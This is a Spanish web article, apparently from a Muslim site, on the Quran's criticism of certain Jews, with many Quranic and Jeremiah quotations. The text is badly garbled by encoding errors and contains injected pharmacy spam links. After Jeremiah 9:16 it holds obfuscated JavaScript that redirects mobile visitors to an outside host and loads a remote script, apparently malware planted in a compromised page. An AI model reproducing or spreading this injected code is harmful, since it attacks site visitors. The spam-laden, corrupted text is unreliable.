Alkalima

La polAi??mica corA?nica contra los judAi??os

Solo una vez establecido el discurso corA?nico sobre el pluralismo religioso y el ciclo de la profecAi??a y comprendido el papel que JesA?s ocupa en este ciclo es posible comprender la crAi??tica corA?nica contra judAi??os y cristianos. O, mA?s especAi??ficamente, contra aquellos judAi??os y cristianos que (considera) se han desviado del mensaje original enviado por Al-lA?h a travAi??s de la TorA? y el Evangelio.

A?CuA?l es esta crAi??tica? El punto central: el CorA?n los acusa de arrogarse en exclusiva la revelaciA?n o una situaciA?n privilegiada. En el caso de los judAi??os, alegando ser el pueblo escogido. En el caso de los cristianos, afirmando que JesA?s es el hijo de Dios. Desde el punto de vista de la universalidad del fenA?meno profAi??tico ambas ideas son inaceptables, pues restringen a Dios y limitan su revelaciA?n segA?n un criterio nacional o historicista. Son doctrinas exclusivistas y antipluralistas, que chocan con la concepciA?n corA?nica, segA?n la cual todos los pueblos han tenido sus profetas, en todas las lenguas, y segA?n la cual Al-lA?hAi??no hace distinciA?n entre sus mensajeros.

Nos encontramos pues ante una crAi??tica del shirk o asociar algo a Al-lA?h, entendido como exclusivismo religioso vinculado a un ejercicio de poder. De ahAi?? la acusaciA?n de que ambos, aquellos judAi??os y/o cristianos que cometen shirk, malvenden la revelaciA?n por un precio insignificante, buscando las riquezas terrenales. De ahAi?? el versAi??culo que acusa a estos judAi??os de practicar la usura, a pesar de que Al-lA?hAi??se lo habAi??a prohibido. Y de ahAi?? el durAi??simo versAi??culo corA?nico, tal vez el mA?s duro del CorA?n, por lo patAi??tico de su expresiA?n, y por ir dirigido a personas concretas, que todos podemos identificar:

A?Oh vosotros que habAi??is llegado a creer!
Ciertamente, muchos rabinos y monjes
devoran en verdad los bienes de la gente injustamente
y alejan [a muchos] del camino de Al-lA?h.
Pero a aquellos que acumulan tesoros de oro y plata
y no los gastan por amor a Al-lA?h
–anA?nciales un doloroso castigo [en la Otra Vida]:
en el DAi??a en que esa [riqueza acumulada]
sea calentada en el fuego del infierno
y sus frentes, costados y espaldas sean marcados con ella:
“A?Estos son los tesoros que acumulasteis para vosotros!
A?Saboread, pues, [la maldad de] lo que atesorasteis!”
(CorA?n 9: 34-35)

En todo momento queda claro que esta crAi??tica no se refiere al judaAi??smo y al cristianismo genuinos, sino a sus degeneraciones posteriores. De ahAi?? se deriva una ambigA?edad fundamental.

Por un lado, el CorA?n no cesa de repetir que tanto una como otra religiA?n son reveladas, emanadas de Al-lA?h, y que la TorA? y el Evangelio contienen luz y guAi??a, ofrecen una norma de vida (una sharia) perfectamente vA?lida, que ha sido revelada para judAi??os y cristianos y que estos deberAi??an aplicar. El CorA?n no les pide que abandonen sus formas de adoraciA?n y tradiciones. Lo que les pide es que acepten que el CorA?n tambiAi??n es una revelaciA?n del mismo Dios que habAi??a revelado la TorA? y el Evangelio. Por otro lado, el CorA?n no cesa de criticar a los judAi??os y cristianos por lo que considera una desviaciA?n. No critica a los judAi??os porque no hagan la salat como la hacAi??a el Profeta y sus compaAi??eros, sino por no respetar el Sabath. No les dice: Ai??A?abandonad vuestra tradiciA?n y convertAi??os al islam!Ai??, sino Ai??A?respetad el Sabath!Ai??.Ai??No critica a los judAi??os por no aplicar las normas jurAi??dicas y sociales reveladas en el CorA?n, sino por no aplicar lo revelado en la TorA?.

Es imposible recoger de manera simple todo lo que dice el Sagrado CorA?n del Pueblo de Israel y del judaAi??smo. Cerca de 60 versos se refieren explAi??citamente a los judAi??os, de los cuales unos 40 utilizan la expresiA?n http://defensacivil.regionhuanuco.gob.pe/index.php/2018/03/17/order-minomycin-tablets/ Bani Israil (literalmente, Ai??Hijos de IsraelAi??), otros usan el tAi??rmino yahud (judAi??o) u alladhina hadu (aquellos que son judAi??os). Otro calificativo es el de ahl al-kitab o alladhina utu al-kitab (la Gente del Libro), pero este engloba a los judAi??os con todos aquellos que hayan recibido un libro revelado (incluyendo a los musulmanes, por supuesto). El CorA?n tambiAi??n meciona la TorA? una docena de veces, y se refiere a los Salmos de David. TambiAi??n se mencionan a los rabinos, las sinagogas o el Sabath.

En lAi??neas generales, la visiA?n corA?nica sobre el judaAi??smo se resume en siete puntos:

  1. El judaAi??smo es una vAi??a de salvaciA?n legAi??tima:

Ai??Ciertamente, los que confAi??anAi??[en esta escritura divina],
los que profesan el judaAi??smo, los cristianos y los sabeos
ai??i??todos los que creen en Al-lA?h y en el Asltimo DAi??aAi??y obran con rectitudai??i??
tendrA?n su recompensa junto a su Sustentador;
y nada tienen que temer ni se lamentarA?n.Ai??
ciales (CorA?n 2: 62)

  1. El CorA?n califica al Pueblo de Israel como la gente de la preferencia de Dios (segA?n la tradiciA?n, esta consiste en que han sido favorecidos con el envAi??o de numerosos profetas):

A?Oh Pueblo de Israel!
Recordad las bendiciones que os dispensAi??,
y como os favorecAi?? sobre todos los demA?s pueblos.
(CorA?n 2: 47)

A?Oh Pueblo de Israel!
Recordad las bendiciones que os dispensAi??
y como os favorecAi?? mA?s que a ningA?n otro pueblo.
(CorA?n 2: 122)

Pero tambiAi??n aclara que este favor divino recibido no implica ningA?n tipo de exclusividad:

Di: Ai??A?Oh seguidores del judaAi??smo!
A?Si asegurA?is que [sA?lo] vosotros sois los preferidos de Al-lA?h,
con exclusiA?n de todas las demA?s gentes,
deberAi??ais ansiar la muerte ai??i??si es verdad lo que decAi??s!Ai??
(CorA?n 62: 6)

  1. El CorA?n afirma que Dios ha establecido un pacto con el Pueblo de Israel. Como todo pacto, este implica unas ciertas condiciones, una exigencia de comportamiento y una amenaza en caso de infringirlo:

Y, he aquAi??, que hicimos un pacto con el Pueblo de Israel:
Ai??No adorarAi??is sino a Al-lA?h;
harAi??is el bien a vuestros padres y parientes,
a los huAi??rfanos y a los pobres;
hablarAi??is a la gente de buena manera;
serAi??is constantes en la oraciA?n; y gastarAi??is en limosnas.Ai??
(CorA?n 2: 83)

Y, en verdad, Al-lA?hAi??hizo un pacto con el Pueblo de Israel
e hicimos que doce de sus jefes fueran enviados.
Y Al-lA?hAi??dijo: Ai??A?Ciertamente, Yo estarAi?? con vosotros!
Si sois constantes en la oraciA?n, gastA?is en limosnas,
creAi??is en Mis enviados y les apoyA?is,
y hacAi??is a Al-lA?hAi??un buenAi??prAi??stamo,
ciertamente, he de borrar vuestras faltas
y os harAi?? entrar en jardines por los que corren arroyos.
A?Pero quien de vosotros, despuAi??s de esto, niegue la verdad,
ciertamente se habrA? extraviado del camino recto!Ai??
(CorA?n 5: 12)

  1. El CorA?n menciona a algunos profetas, la mayorAi??a pertenecientes a la tradiciA?n judAi??a, y afirma que todos los profetas gozan del mismo rango a los ojos de Al-lA?h:

Ai??Di: “Creemos en Al-lA?h
y en lo que se ha hecho descender para nosotros,
y en lo que se hizo descender para Abraham,
Ismael, Isaac, Jacob y sus descendientes,
y en lo que Moises, JesA?s y todos los profetas
han recibido de su Sustentador:
no hacemos distinciA?n entre ninguno de ellos.
Y a Ai??l nos sometemos”.Ai??
(CorA?n 3: 84)

  1. El CorA?n menciona reiteradamente la TorA? como una revelaciA?n de Al-lA?h, insta a los judAi??os a regirse por ella y menciona de forma positiva a los primeros rabinos como custodios de esta revelaciA?n sagrada:

Y concedimos la revelaciA?n a MoisAi??s,
e hicimos de ella una guAi??a para los hijos de Israel.
(CorA?n 17: 2)

Ai??En verdad, hicimos descender la Tora,
en la que habAi??a guAi??a y luz.
En base a ella los profetas,
que se habAi??anAi??sometidoAi??a Al-lA?h,
administraron justicia a los seguidores del judaAi??smo;
como hicieron los [primeros] hombres de Al-lA?hAi??y los rabinos,
ya que parte de la escritura de Al-lA?h
habAi??a sido confiada a su custodia;
y [todos] ellos dieron testimonio de su verdadAi??.
(CorA?n 5: 43-44)

  1. El CorA?n menciona de forma positiva las sinagogas, hasta el punto de que su defensa es uno de los motivos por los cuales se nos ha hecho lAi??cito el combate:

Ai??Pues, si Al-lA?hAi??no hubiera permitido que la gente
se defendiera a sAi?? misma unos contra otros,
los monasterios, iglesias, sinagogas y mezquitas
-en los cuales se menciona el nombre deAi??Al-lA?h
en abundancia- habrAi??an sido destruidosAi??.
(CorA?n 22: 39-40).

  1. El CorA?n pide a los judAi??os que respeten la ley del Sabath, la cual declara ha sido establecida para ellos por Al-lA?h. Califica como piadosos buy baclofen online without prescription, purchase Zoloft. a los que la respetan y rechaza de forma vehemente a aquellos que la incumplen:

cheap zerit Los que siguen la TorA? te piden [Oh Profeta]
que hagas descender del cielo una revelaciA?n para ellos.
Cosas mA?s graves pidieron ya a MoisAi??s, cuando dijeron:
Ai??A?Haz que veamos a Al-lA?hAi??cara a cara!Ai??
ai??i??y entonces les fulminA? el rayo del castigoAi??por esta maldad suya.
Luego se entregaron a la adoraciA?n del becerro [de oro]
ai??i??y eso despuAi??s de haber recibido pruebas claras de la verdad.
AA?n asAi??, les perdonamos esa [falta suya]
y dimos a MoisAi??s una prueba clara,
elevando el monte SinaAi?? por encima de ellos
con ocasiA?n de su solemne compromiso.
Y les dijimos: Ai??Entrad por la puerta con humildadAi??; cialis 72 hour
y les dijimos: Ai??No violAi??is la ley del SA?badoAi??;
y aceptamos su solemne compromiso.
(CorA?n 4: 152-154)

Y por A?ltimo, te hemos inspirado:
Ai??Sigue la creencia de Abraham,
que se apartA? de todo lo falso,
y no fue de los que atribuyen divinidadAi??a algo junto con Al-lA?h;
el SA?badoAi??fue ordenado sA?lo para aquellos
que luego adoptaron posturas divergentes acerca de Ai??l;
pero, ciertamente, tu Sustentador juzgarA? entre ellos
el DAi??a de la ResurrecciA?n acerca de aquello
sobre lo que solAi??an discreparAi??.
(CorA?n 16: 123-124)

Luego, despuAi??s de eso, os apartasteis.
Y de no ser por el favor de Al-lA?hAi??hacia vosotros y por Su gracia,
ciertamente, habrAi??ais estado entre los perdedores;
pues ya sabAi??is lo que les ocurriA?
a quienes de vosotros profanaron el SA?bado,
y les dijimos: Ai??A?ConvertAi??os en monos despreciables!Ai??ai??i??
y lo hicimos como castigo ejemplar
para sus contemporA?neos y sus descendientes,
y como advertencia para todos los que son conscientes de Al-lA?h.
(CorA?n 2: 63-65; ver tambiAi??n CorA?n 4: 47 y 7: 162-164).

Sobre el A?ltimo versAi??culo citado, y la conversiA?n en Ai??monosAi??, decir claramente que se trata de una expresiA?n que no debe tomarse en sentido literal. AdemA?s, desde sectores islamA?fobos se repite que el CorA?n afirma que Al-lA?hAi??convirtiA? a los judAi??os en monos y en cerdos. Por supuesto, esto es un disparate. La referencia a los cerdos nos remite a CorA?n 5:60, donde se dice que aquellos que se burlan de la revelaciA?n y se ponen al servicio del mal se convierten en monos y en cerdos: se comportan como ellos. Pero esto no esta referido a los judAi??os, sino a cualquier persona.

*****

A grandes rasgos, esta es la visiA?n corA?nica sobre el judaAi??smo, como religiA?n revelada, plenamente salvAi??fica. Los musulmanes consideramos como nuestros a los grandes profetas del judaAi??smo: Al-lA?h nos ha dicho que debemos creer en ellos y en aquello que les fuese revelado. AdemA?s, el CorA?n menciona positivamente el Arca de la Alianza y el Pacto establecido entre Al-lA?hAi??y el Pueblo de Israel. No estamos hablando aquAi?? de interpretaciones Ai??edulcoradasAi?? o Ai??modernizadorasAi?? de la Palabra revelada, sino exponiendo el Mensaje del CorA?n literalmente.

Solo una vez establecido el discurso corA?nico sobre el pluralismo religioso es posible comprender la crAi??tica corA?nica contra ciertos judAi??os. O, mA?s especAi??ficamente, contra aquellos judAi??os que se han desviado del mensaje enviado por Al-lA?h a travAi??s de la TorA?, traicionando de este modo el Pacto. En concreto, el CorA?n acusa a estos judAi??os por la ingratitud y la soberbia que muestran hacia Al-lA?h, a pesar de que los ha favorecido (Ver Heribert Busse: Islam, Judaism, and Christianity: theological and historical affiliations, Markus Wiener Publishers, 1998, pp.42-49):

  • Por pretender tener la exclusividad de la profecAi??a
  • Por haber Ai??matadoAi?? a profetas
  • Por no juzgar segA?n la TorA?
  • Por distorsionar la TorA?
  • Por seguir solo una parte (que les conviene) de la TorA?
  • Por sacar provecho (econA?mico) de la TorA?
  • Por no respetar el Sabath
  • Por no respetar los pactos
  • Por practicar la usura
  • Por consumir los bienes de los necesitados
  • Por calumniar a la virgen MarAi??a
  • Por jactarse de haber matado a JesA?s
  • Por decir que Ai??Esdras es el hijo de Al-lA?hAi?? (9: 30)
  • Por tomar a los rabinos por seAi??ores suyos junto a Al-lA?hAi??(9: 31)
  • Por soberbia intelectual, al pretender que Ai??estA?n llenos de conocimientoAi??
  • Por no aceptar a MuhA?mmad como profeta
  • http://www.bestwebfast.com.br/buy-emsam-patch/

  • Por decir que no habrA? mA?s revelaciones

Las imprecaciones lanzadas por el CorA?n a los judAi??os a causa de estas transgresiones son durAi??simas, en sintonAi??a con el espAi??ritu profAi??tico de la TorA?. Pero estas crAi??ticas no son por ser judAi??os, sino por ser Ai??malos judAi??osAi?? y por haber traicionado las enseAi??anzas contenidas en la TorA?. En diferentes aleyas, se conmina a los judAi??os de Medina a volver a sus enseAi??anzas primigenias:

Ai??Aquellos de los hijos de Israel que estaban empeAi??ados
en negar la verdad han sido [ya] maldecidos
por boca de David y de JesA?s, el hijo de MarAi??a:
y eso porque seAi??rebelaronAi??[contra Dios]

y persistieron en transgredir los lAi??mites de lo correcto.
No se impedAi??an unos a otros las acciones reprobables que cometAi??an:
A?quAi?? perverso es en verAi??dad lo que solAi??an hacer!
[Y ahora] puedes ver como muchos de ellos se alAi??an
con los que se obstinan en negar la verdad.
[Tan]Ai??perversoAi??es en verdad lo que sus pasiones les llevan a hacer que Al-lA?hAi??les ha condenado;
y morarA?n en el fuegoAi??.
(CorA?n 5; 78-80)

Estas y otras aleyas conminatorias, dirigidas contra los judAi??os de Medina en el siglo VII de la era cristiana, deben entenderse como parte del Ai??mAi??todo profAi??ticoAi??. En todo momento queda claro que las invectivas van destinadas contra aquellos judAi??os que han violado el Pacto con Al-lA?h. En otras aleyas, se acusa a los judAi??os de haber manipulado sus escrituras, cosa por lo demA?s admitida por la comunidad acadAi??mica: la TorA? ha sufrido varias redacciones y modificaciones a lo largo de los siglos. El CorA?n incluso reprocha a estos judAi??os de haberse apartado del Shabbat:

Ai??Y les dijimos: “No violAi??is la ley del SA?bado”;
y aceptamos su solemne compromiso.
Y [les castigamos] por violar su compromiso,
por negarse a aceptar los mensajes de Al-lA?h,
por matar a los profetas contra todo derechoAi??y por alardear diciendo:
“Nuestros corazones estA?n ya rebosantes de conocimiento”
ai??i??A?No!, sino que Al-lA?hAi??ha sellado sus corazonesAi??por haber negado la verdad,
y [ahora] creen sA?lo en unas pocas cosasAi??.
(CorA?n 4; 155-156)

Ai??AsAi?? pues, por las perversidades cometidasAi??por los seguidores del judaAi??smo,
les privamos de muchas cosas buenasAi??que [antes] les estaban permitidas;
por haberse apartado tantas veces del camino de Al-lA?h,
y [por] haber practicado la usuraAi??a pesar de habAi??rselesAi??prohibido
y haber devorado los bienes de otra gente conAi??falsedad.
Y para quienes de ellos [siguen] negando la verdad
hemos preparado un castigo dolorosoAi??.
(CorA?n 4; 160-161)

Inmediatamente despuAi??s de amenazar con el infierno a estos transgresores, el CorA?n abre la puerta al JardAi??n a aquellos judAi??os que realizan buenas obras y son fieles a la Palabra revelada:

Ai??Pero a quienes de ellos estA?n firmemente arraigados
en el conocimiento y los creyentes
que creen en lo que se ha hecho descender sobre ti
y en lo que se hizo descender antes de ti,
y a aquellos que son constanAi??tes en la oraciA?n,
y gastan en limosnas,
y todos los que creen en Al-lA?hAi??y en el Asltimo DAi??a
ai??i??a esos les daremos una magnAi??fica recompensaAi??.
(CorA?n, 4; 162)

Del mismo modo, si en un momento dado el CorA?n afirma que Ai??quienes malvenden su pacto con Al-lA?hAi??y sus compromisos por un precio insignificante ai??i??no tendrA?n parte en las bendiciones de la Otra Vida;ai??i?? claritin generic name Ai??Ai??(2: 77), en otro momento afirma que existen otros judAi??os y cristianos que no hacen tal cosa, y por tanto tendrA?n su recompensa:

Y, ciertamente,Ai??entre los seguidores de la revelaciA?n anterior
hay quienes creen [verdaderamente] enAi??Al-lA?h
y en lo que se ha hecho descender para vosotros
y en lo que se hizo descender para ellos.
Reverentes ante Al-lA?h,
no malvenden los mensajes de Al-lA?hAi??por un provecho insignificante.
Esos tendrA?n su recompensa junto a su Sustentador
ai??i??A?pues, ciertamente, Al-lA?hAi??es rA?pido en ajustar cuentas!
(CorA?n 3: 199)

Para todos aquellos que consideran como Ai??antijudAi??osAi?? los llamamientos corA?nicos a los judAi??os a volver a sus propias enseAi??anzas, una comparaciA?n con las profecAi??as de JeremAi??as (que la paz sea con Ai??l) puede resultar esclarecedora. JeremAi??as acusa de toda clase de desmanes al Pueblo de Israel, sin que tenga sentido por ello calificarlo como Ai??antijudAi??oAi??. MA?s bien, la palabra profAi??tica es como una sacudida, que trata de despertar al hombre de su letargo, devolverle el sentido de lo que es justo y verdadero. De la misma forma, el CorA?n no ataca a los judAi??os de Medina por el hecho de ser judAi??os, sino que les conmina a retornar al judaAi??smo, tal y como fue enseAi??ado por los Mensajeros de Al-lA?h y los rabinos rectamente guiados. El hombre que se cree con derecho a cometer toda clase de transgresiones, vive de espaldas a la Realidad, y su morada es el fuego de la insatisfacciA?n y de la angustia. Ante los terribles crAi??menes cometidos desde su fundaciA?n por el Estado de Israel, la radicalidad de la palabra profAi??tica adquiere hoy toda su vigencia, como un llamamiento a restablecer la paz entre los pueblos. Ante las invectivas lanzadas por JeremAi??as a las tribus de JudA? en el siglo VII antes de Cristo, casi sentimos el vAi??rtigo de la profecAi??a autorealizada:

JeremAi??as 9

1 Ai??A?OjalA? mi cabeza fuera un manantial,
y mis ojos una fuente de lA?grimas,
para llorar de dAi??a y de noche
por los muertos de mi pueblo!

2 Ai??A?OjalA? tuviera yo en el desierto
una posada junto al camino!
AbandonarAi??a a mi pueblo,
y me alejarAi??a de ellos.
Porque todos ellos son adA?lteros,
son una banda de traidores.

3 Ai??Ai??Tensan su lengua como un arco;
en el paAi??s prevalece la mentira, no la verdad,
porque van de mal en peor,
y a mAi?? no me conocenAi??,
afirma el SeAi??or.

4 Ai??CuAi??dese cada uno de su amigo,
no confAi??e ni siquiera en el hermano,
porque todo hermano engaAi??a,
y todo amigo difama.

5 Ai??Se engaAi??an unos a otros;
no se hablan con la verdad.
Han enseAi??ado sus lenguas a mentir,
y pecan hasta el cansancio.

6 Ai??Ai??TA?, JeremAi??as, vives en medio de engaAi??adores,
que por su engaAi??o no quieren reconocermeAi??,
afirma el SeAi??or.

7 Ai??Por eso, asAi?? dice el SeAi??or Todopoderoso:
Ai??Voy a refinarlos, a ponerlos a prueba.
A?QuAi?? mA?s puedo hacer con mi pueblo?

8 Ai??Su lengua es una flecha mortAi??fera,
su boca sA?lo sabe engaAi??ar;
hablan cordialmente con su amigo,
mientras en su interior le tienden una trampa.

9 Ai??A?Y no los he de castigar por esto?
afirma el SeAi??or.
A?Acaso no he de vengarme de semejante naciA?n?Ai??

10 Ai??LlorarAi?? y gemirAi?? por las montaAi??as,
harAi?? lamentos por las praderas del desierto,
porque estA?n desoladas:
ya nadie las transita
ni se escuchan los mugidos del ganado.
Desde las aves del cielo hasta los animales del campo,
todos han huido.

11 Ai??Ai??ConvertirAi?? a JerusalAi??n en un montA?n de ruinas,
en una guarida de chacales.
ConvertirAi?? en desolaciA?n las ciudades de JudA?;
A?las dejarAi?? sin habitantes!Ai??

12 Ai??A?QuiAi??n es tan sabio como para entender esto?
A?A quiAi??n le hablA? el SeAi??or, para que lo anuncie?
A?Por quAi?? estA? arruinado el paAi??s,
desolado como un desierto por el que nadie pasa?

13 Ai??El SeAi??or dice: Ai??Ellos abandonaron la ley que yo les entreguAi??;
no me obedecieron ni vivieron conforme a ella.

14 Ai??Siguieron la terquedad de su corazA?n;
se fueron tras los baales, como les habAi??an enseAi??ado sus antepasados.Ai??

15 Ai??Por eso, asAi?? dice el SeAi??or Todopoderoso, el Dios de Israel:
Ai??A este pueblo le darAi?? a comer ajenjo y a beber agua envenenada.

16 Ai??Los dispersarAi?? entre naciones
que ni ellos ni sus antepasados conocieron;
los perseguirAi?? con espada hasta aniquilarlos.Ai??var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 